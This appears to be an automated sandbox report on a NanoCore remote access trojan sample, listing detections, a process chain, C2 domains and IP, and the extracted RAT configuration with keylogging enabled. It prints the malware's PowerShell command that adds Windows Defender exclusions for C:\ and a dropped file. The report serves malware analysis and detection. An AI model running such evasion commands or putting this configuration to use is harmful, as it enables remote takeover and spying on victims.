Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\ZVFVY7NwZ7.exe' , ParentImage: C:\Users\user\Desktop\ZVFVY7NwZ7.exe, ParentProcessId: 2220, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs' , ProcessId: 1784

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1784, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe', ProcessId: 3016

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: ZVFVY7NwZ7.exe

Avira: detected

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Avira: detection malicious, Label: HEUR/AGEN.1129534
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe	Avira: detection malicious, Label: HEUR/AGEN.1129534

Found malware configuration

Show sources

Source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for domain / URL

Show sources

Source: wekeepworking.sytes.net	Virustotal: Detection: 7%			Perma Link
Source: wekeepworking.sytes.net	Virustotal: Detection: 7%			Perma Link

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: ZVFVY7NwZ7.exe

Joe Sandbox ML: detected

Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack	Avira: Label: TR/NanoCore.fadte
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: ZVFVY7NwZ7.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: ZVFVY7NwZ7.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ZVFVY7NwZ7.exe, 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 4x nop then jmp 054A1AA4h	0_2_054A1654
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_06440500
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_064404F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49727 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49732 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49733 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49734 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49735 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49738 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49742 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49743 -> 79.134.225.90:1144
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49744 -> 79.134.225.90:1144

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: wekeepworking.sytes.net
Source: Malware configuration extractor	URLs: wekeepworking12.sytes.net

Source: global traffic

TCP traffic: 192.168.2.3:49727 -> 79.134.225.90:1144

Source: Joe Sandbox View

IP Address: 79.134.225.90 79.134.225.90

Source: Joe Sandbox View

ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH

Source: unknown

DNS traffic detected: queries for: wekeepworking.sytes.net

Source: ZVFVY7NwZ7.exe, 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: ZVFVY7NwZ7.exe	String found in binary or memory: http://schemas.microso
Source: ZVFVY7NwZ7.exe, 00000000.00000002.333622797.0000000002E61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000003.399210115.0000000007577000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester

Source: ZVFVY7NwZ7.exe, 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 5612, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 2220, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: ZVFVY7NwZ7.exe PID: 2220, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.674e8a4.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6410000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6744c9f.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.409e360.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.5670000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.2ecdb24.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6480000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.408a169.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.5420000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6494629.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.6790000.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6420000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6040000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6490000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40239b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.6740000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6450000.17.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.4085b40.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.2ec18dc.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.0.ZVFVY7NwZ7.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.0.ZVFVY7NwZ7.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.63f0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.6470000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.ZVFVY7NwZ7.exe.2ecdb24.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.2ebcaa0.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.3eff6b0.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.2edc690.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.ZVFVY7NwZ7.exe.40c39d0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.ZVFVY7NwZ7.exe.2ec18dc.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe'			Jump to behavior

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_0113260D	0_2_0113260D
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_01132630	0_2_01132630
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_054A0040	0_2_054A0040
Source: C:\Users\user\Desktop\ZVFVY7NwZ7.exe	Code function: 0_2_054A0011	0_2_054A0011
Source: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe	Code function: 13_2_0537F5F8	13_2_0537F5F8
